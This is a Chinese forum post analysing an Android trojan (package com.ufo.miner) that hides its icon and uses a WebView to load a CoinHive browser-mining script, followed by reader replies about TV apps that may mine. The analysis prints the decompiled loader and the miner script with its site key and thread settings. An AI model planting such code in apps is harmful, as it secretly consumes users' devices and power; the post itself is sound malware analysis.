简单分析一个少见的安卓挖矿程序(CoinHive)
本帖最后由 狄人3 于 2022-1-21 19:01 编辑看到一个挂的木马,包名com.ufo.miner,安装后图标消失,在后台运行
没有root,要提取apk可以用adb
adb shell pm path {要看的包名}
之后pull出来就可以了,反编译看一下
非常简单,无壳无加密,直接看main
this.webView = (WebView)this.findViewById(0x7F080000);// id:webView
this.settings = this.webView.getSettings();
this.settings.setJavaScriptEnabled(true);
this.settings.setDomStorageEnabled(true);
this.webView.loadUrl("file:///android_asset/run.html");
}
很显然开了个webview然后加载run.html
那么再来看一下run.html
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('fwW95bBFO91OKUsz1VhlMEQwxmDBz7XE',{
threads:4,
throttle: 0.8
});
miner.start();
</script>
然后去访问js地址,发现已经被人干了
这个是臭名昭著的Coinhive 家族的js挖矿病毒,具体可以看别人的分析,百度一下就好,但是我也是第一次看到安卓上的挖矿
现在访问这个域名会被重定向,告诉我们这是个浏览器挖矿,但是域名被他搞走了
其实感觉挺奇怪的,安卓就这点算力还要拿来挖矿。。。{:301_1008:} weiwei792071952 发表于 2022-1-22 19:41
听说现在有很多TV软件 都是挖矿软件 。。。我电视装了好几个 不知道是不是挖矿的
电视的硬件不是还不如手机吗? weiwei792071952 发表于 2022-1-22 19:41
听说现在有很多TV软件 都是挖矿软件 。。。我电视装了好几个 不知道是不是挖矿的
卧槽,我这个就是一个tv的样本 听说现在有很多TV软件 都是挖矿软件 。。。我电视装了好几个 不知道是不是挖矿的 学习了不错 第一次看到安卓挖矿的病毒 竟然还有安卓病毒来挖矿 weiwei792071952 发表于 2022-1-22 19:41
听说现在有很多TV软件 都是挖矿软件 。。。我电视装了好几个 不知道是不是挖矿的
好像很多电视自带的 我的摩托罗拉998++能不能挖矿
又学习到了 感觉知识又多了一点